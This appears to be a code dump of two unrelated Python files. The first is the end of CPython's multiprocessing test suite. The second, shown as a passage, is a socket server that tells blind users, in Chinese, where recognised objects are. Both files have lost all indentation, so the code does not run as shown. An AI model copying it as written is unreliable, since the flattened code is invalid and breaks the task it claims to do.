self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="RLock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
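#
# Illustrative sketch (not part of this module): a start-method-specific test
# module is expected to be a thin wrapper that calls
# install_tests_in_module_dict() on its own globals.  Roughly, assuming the
# CPython layout (the module name below is only an example):
#
#     # test_multiprocessing_spawn.py
#     import unittest
#     from test._test_multiprocessing import install_tests_in_module_dict
#
#     install_tests_in_module_dict(globals(), 'spawn')
#
#     if __name__ == '__main__':
#         unittest.main()
#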
|
Server_Socket.py
|
import socket
import threading
import Server_GUI
import os
import cv2
import numpy as np
from scipy.linalg import solve
import math
import time
import client
TCP_IP = ''
TCP_PORT = 1234
send_msg = ''
camera_port = 0
rec_result = ''
co = 0 # counts the points clicked with the mouse while initializing the coordinate system
x = 0.000
y = 0.000
'''
●(0,0) ●(32,0)
●(0,32)
'''
px = [0.000] # stores the clicked x coordinates during coordinate initialization
py = [0.000] # stores the clicked y coordinates during coordinate initialization
rx = [0.000, 4.000, 0.000] # real-world x coordinates of the 3 calibration points (scale reference)
ry = [0.000, 0.000, 4.000] # real-world y coordinates of the 3 calibration points (scale reference)
t = 0
tx1, ty1, tx2, ty2, sx1, sy1, sx2, sy2 = 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000
solx, soly = 0.000, 0.000
before_pos = []
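# Illustrative sketch (not part of the original file): draw_circle() records two
# pixel-space basis vectors (tx1, ty1), (tx2, ty2) and their real-world
# counterparts (sx1, sy1), (sx2, sy2); four() later converts a pixel point by
# solving a 2x2 linear system.  The helper below shows that conversion in
# isolation.  Its name and signature are assumptions and it is not called
# anywhere else in this file; it reuses the numpy/scipy imports above.
def _pixel_offset_to_real(dx, dy, basis_px, basis_real):
    # basis_px: ((tx1, ty1), (tx2, ty2)) pixel offsets of calibration points 2 and 3
    # basis_real: ((sx1, sy1), (sx2, sy2)) real-world offsets of the same points
    (bx1, by1), (bx2, by2) = basis_px
    (ex1, ey1), (ex2, ey2) = basis_real
    a = np.array([[bx1, bx2], [by1, by2]])
    b = np.array([dx, dy])
    c1, c2 = solve(a, b)  # coefficients of the offset in the pixel basis
    # the same coefficients applied to the real-world basis give the position
    return c1 * ex1 + c2 * ex2, c1 * ey1 + c2 * ey2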
class ReceiveThread(threading.Thread):
def __init__(self, s, count):
threading.Thread.__init__(self)
self.cs = s
self.gui = Server_GUI.GUI()
Server_GUI.iscreate2 = True
if count == 0:
# initialize first position of every thing in the room
vcap = cv2.VideoCapture(camera_port)
self.rret, self.rframe = vcap.read()
cv2.imwrite('init_recog.jpg', self.rframe)
self.cli = client.client_socket()
init = threading.Thread(target=self.cli.create, args = ('init_recog.jpg', True))
init.start()
# initialize the coordinate
cv2.namedWindow('image')
cv2.setMouseCallback('image', self.draw_circle)
self.img = cv2.imread('tmpdemo.jpg')
while(1):
cv2.imshow('image', self.rframe)
# cv2.imshow('image', self.img)
k = cv2.waitKey(1)
if co == 3:
cv2.destroyAllWindows()
break
cv2.imwrite('init_coor.jpg', self.rframe)
init.join()
print('initial object recognition: ', before_pos, '\n')
def run(self):
while True:
self.recv_msg = self.cs.recv(1024)
if not self.recv_msg:
break
else:
if self.validCommand(self.recv_msg.decode('utf-8')) > 0:
if self.validCommand(self.recv_msg.decode('utf-8')) != 3:
self.cs.send('正在進行辨識\n'.encode('utf-8'))
else:
self.cs.send('正在紀錄傢俱位置\n'.encode('utf-8'))
if os.path.isfile('./output.jpg'):
os.system('rm output.jpg')
cap = cv2.VideoCapture(camera_port)
if not cap.isOpened():
cap.open()
# save the 70th frame (for brightness of the image)
frameindex = 0
while True:
ret, frame = cap.read()
# cv2.imshow('frame', frame)
if frameindex == 70:
cv2.imwrite('output.jpg', frame)
break
frameindex += 1
cap.release()
cv2.destroyAllWindows()
# receiving result from workstation server
self.cli = client.client_socket()
rec_result = self.cli.create('output.jpg', False)
result_list = rec_result.split()
# result back to app
if len(result_list) < 3:
self.cs.send('無辨識結果\n'.encode('utf-8'))
else:
if self.validCommand(self.recv_msg.decode('utf-8')) == 1: # "has it been moved?" command
if self.isMoved(self.obj, before_pos, result_list) == 1:
self.cs.send('沒有'.encode('utf-8'))
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('的辨識結果\n'.encode('utf-8'))
elif self.isMoved(self.obj, before_pos, result_list) == 2:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('有移動過\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('沒有移動過\n'.encode('utf-8'))
elif self.validCommand(self.recv_msg.decode('utf-8')) == 2: # "where is it?" command
for index, rl in enumerate(result_list):
# print(rl, self.obj)
if rl == self.obj:
objdir = self.direction(result_list[index+1], result_list[index+2])
origin = self.four(320, 480) # calculate coordinate of (320,480)
realxy = self.four(int(float(result_list[index+1])), int(float(result_list[index+2])))
objdis = self.distance(realxy[0], realxy[1], origin[0], origin[1])
step = math.ceil(objdis / 4)
# sample reply: "the chair is about five steps to your front-left, within reach of your white cane"
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('大約在你的'.encode('utf-8'))
self.cs.send(objdir.encode('utf-8'))
self.cs.send(str(step).encode('utf-8'))
self.cs.send('步,並在導盲杖可觸及的範圍內\n'.encode('utf-8'))
break
elif index == len(result_list) - 1:
self.cs.send('沒有'.encode('utf-8'))
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('的辨識結果\n'.encode('utf-8'))
elif self.validCommand(self.recv_msg.decode('utf-8')) == 3: # "record furniture positions" command
self.cs.send('傢俱位置紀錄完畢\n'.encode('utf-8'))
elif self.validCommand(self.recv_msg.decode('utf-8')) == 4: # "I want to find X" command
print(result_list)
if not 'diningtable' in result_list or not 'person' in result_list:
self.cs.send('沒有桌子的辨識結果或無法定位您的位置\n'.encode('utf-8'))
else:
if not self.obj in result_list:
self.cs.send('沒有'.encode('utf-8'))
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('的辨識結果\n'.encode('utf-8'))
else: # person and table detected
''' (If person is at the other side of the table, change the direction.)
| p | (facing down)
-----------------
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 5 | 6 | 7 | 8 |
-----------------
'''
table_index = result_list.index('diningtable')
person_index = result_list.index('person')
obj_index = result_list.index(self.obj)
table_x = int(float(result_list[table_index + 1]))
table_y = int(float(result_list[table_index + 2]))
person_y = int(float(result_list[person_index + 2]))
obj_x = int(float(result_list[obj_index + 1]))
obj_y = int(float(result_list[obj_index +2]))
w = int(float(result_list[table_index + 3]))
h = int(float(result_list[table_index + 4]))
if table_y >= person_y: # person is behind the table (facing the camera)
if obj_y >= table_y - h and obj_y <= table_y - h/2 and obj_x >= table_x - w and obj_x <= table_x + w:
# object is between person and up half of the table on the image
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# object is at position 4
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左手邊\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# object is at position 1
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右手邊\n'.encode('utf-8'))
else:
# object is at position 2 or 3
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
elif obj_y >= table_y - h/2 and obj_y <= table_y and obj_x >= table_x - w and obj_x <= table_x + w:
# object is at down half of the table on the image
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# object is at position 8
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左前方\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# object is at position 5
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右前方\n'.encode('utf-8'))
else:
# object is at position 2 or 3
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
else:
# object is not in the range of table
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('不在桌子上,請使用另一指令\n'.encode('utf-8'))
else: # person is in front of the table (not facing the camera)
if obj_y >= table_y - h/2 and obj_y <= table_y and obj_x >= table_x - w and obj_x <= table_x + w:
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# position 8
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右手邊\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# position 5
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左手邊\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
elif obj_y >= table_y - h and obj_y <= table_y - h/2 and obj_x >= table_x - w and obj_x <= table_x + w:
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# position 4
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右前方\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# position 1
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左前方\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('不在桌子上,請使用另一指令\n'.encode('utf-8'))
# update before_pos[]
rl = 0
while rl + 3 <= len(result_list):
same = False
for bp in before_pos: # every obj in result_list is compared with whole before_pos list
if result_list[rl] == bp[0]:
same = True
bp[1] = result_list[rl+1]
bp[2] = result_list[rl+2]
if not same: # new detected object
tmp = []
tmp.append(result_list[rl])
tmp.append(result_list[rl+1])
tmp.append(result_list[rl+2])
before_pos.append(tmp)
if result_list[rl] == 'diningtable': # skip h and w
rl += 2
rl += 3
print('updated object: ', before_pos, '\n')
else:
send_msg = '指令錯誤 請重新輸入\n'
self.cs.send(send_msg.encode('utf-8'))
# self.gui.text_change('client: ' + self.recv_msg.decode('utf-8'))
def draw_circle(self, event, x, y, flags, param):
global ix, iy, co, tx1, tx2, ty1, ty2, px, py, sx1, sx2, sy1, sy2
ix, iy = 0.000, 0.000
if event == cv2.EVENT_LBUTTONDOWN:
ix, iy = x, y
cv2.rectangle(self.rframe, (ix, iy), (x, y), (0, 255, 0), 4)
# cv2.rectangle(self.img, (ix, iy), (x, y), (0, 255, 0), 4)
px.append(ix)
py.append(iy)
co = co+1
if(co == 3):
print('initial coordinate: '
'(', px[1], ',', py[1], ')'
'(', px[2], ',', py[2], ')'
'(', px[3], ',', py[3], ')')
# convert coordinate
sx1 = rx[1] - rx[0]
sy1 = ry[1] - ry[0]
sy2 = ry[2] - ry[0]
sx2 = rx[2] - rx[0]
tx1 = px[2] - px[1]
ty1 = py[2] - py[1]
tx2 = px[3] - px[1]
ty2 = py[3] - py[1]
def four(self, xx, yy): # get the real coordinate of the 4th point
# Express the pixel offset of (xx, yy) from the first calibration point in
# the pixel-space basis recorded by draw_circle(); solving the 2x2 system
# gives the point's coordinates on the calibrated real-world axes.
global t, t1, t2
ix, iy = xx, yy
if xx == 320 and yy == 480:
t1 = 320 - px[1]
t2 = 480 - py[1]
else:
px.append(ix)
py.append(iy)
t1 = px[4+t]-px[1]
t2 = py[4+t]-py[1]
# print(xx, yy, px[4+t], py[4+t], t1, t2)
t = t + 1
a = np.array([[tx1, tx2], [ty1, ty2]])
b = np.array([t1, t2])
c = solve(a, b)
return c
def direction(self, xx, yy):
xx, yy = int(float(xx)), (-1)*int(float(yy))
# (x1,y1), (x2,y2) are points on the line, (xx,yy) is point to be checked
if xx > 320:
x1, y1 = 320, -480
x2, y2 = 640, -295 # the two points on the 30 degree line
x3, y3 = 597, 0 # the two points on the 60 degree line
